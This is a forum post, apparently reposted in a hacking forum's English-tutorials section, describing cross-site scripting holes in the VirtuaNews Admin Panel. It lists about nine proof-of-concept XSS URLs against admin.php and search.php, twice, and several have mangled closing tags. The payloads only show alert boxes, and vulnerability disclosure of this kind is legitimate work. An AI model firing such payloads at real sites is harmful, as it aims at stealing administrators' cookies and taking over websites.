Jump to content
zbeng

Cross Site Scripting Vulnerabillity (

By zbeng, in Tutoriale in engleza

Recommended Posts

zbeng Newbie

zbeng

Posted
Posted

1) Introduction

2) Bug

3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============

1) Introduction

===============

VirtuaNews Admin Panel is a good administration software. Many

administrators choose it

to be their "safe door", therefore it should strong and safe. The main risk

describes in this

advisory is the harm that could be done to the administration staff. When

the vulnerabilities

concerns the staff it is more dangerous that harming users, because if a

staff's member cookie

is stolen, the attackers can take over the website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======

2) Bug

======

The Vulnerabillity is Cross Site Scripting. If an attacker will request any

of the following

urls from the server:

http://<host>/admin.php?"><script>alert('XSS')script>

http://<host>/forum/search.php?do=process&showposts=0&query=<script>alert('X

SS')script>

http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&main

news=~~~~"></textarea><script>alert('XSS')script>

http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&main

news=~~~~"></textarea>--><script>alert('XSS')script>

http://<host>/admin.php?">action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&ma

innews=~~~~"></textarea><script>alert('XSS')script>

http://<host>/admin.php?action=files&expand="><script>alert('XSS')script>

http://<host>/admin.php?action=files_cat_delete&id="><script>alert('XSS')</s

cript>

http://<host>/admin.php?action=files_check&catid="><script>alert('XSS')</scr

ipt>

http://<host>/admin.php?action=newslogo_upload&"><script>alert('XSS')</scrip

t>

XSS appears and the server allows an attacker to inject & execute scripts.

In the words of securityfocus.com :

~~~~~~~~~~~~~~~~~~~~~~~~~~

If all of these circumstances are met, an attacker may be able to exploit

this issue

via a malicious link containing arbitrary HTML and script code as part of

the hostname.

When the malicious link is clicked by an unsuspecting user, the

attacker-supplied HTML

and script code will be executed by their web client. This will occur

because the server

will echo back the malicious hostname supplied in the client's request,

without sufficiently

escaping HTML and script code.

Attacks of this nature may make it possible for attackers to manipulate web

content or to

steal cookie-based authentication credentials. It may be possible to take

arbitrary actions as the victim user.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========

3) The Code

===========

http://<host>/admin.php?"><script>alert('XSS')script>

http://<host>/forum/search.php?do=process&showposts=0&query=<script>alert('X

SS')script>

http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&main

news=~~~~"></textarea><script>alert('XSS')script>

http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&main

news=~~~~"></textarea>--><script>alert('XSS')/script>

http://<host>/admin.php?">action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&ma

innews=~~~~"></textarea><script>alert('XSS')script>

http://<host>/admin.php?action=files&expand="><script>alert('XSS')script>

http://<host>/admin.php?action=files_cat_delete&id="><script>alert('XSS')</s

cript>

http://<host>/admin.php?action=files_check&catid="><script>alert('XSS')</scr

ipt>

http://<host>/admin.php?action=newslogo_upload&"><script>alert('XSS')</scrip

t>

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...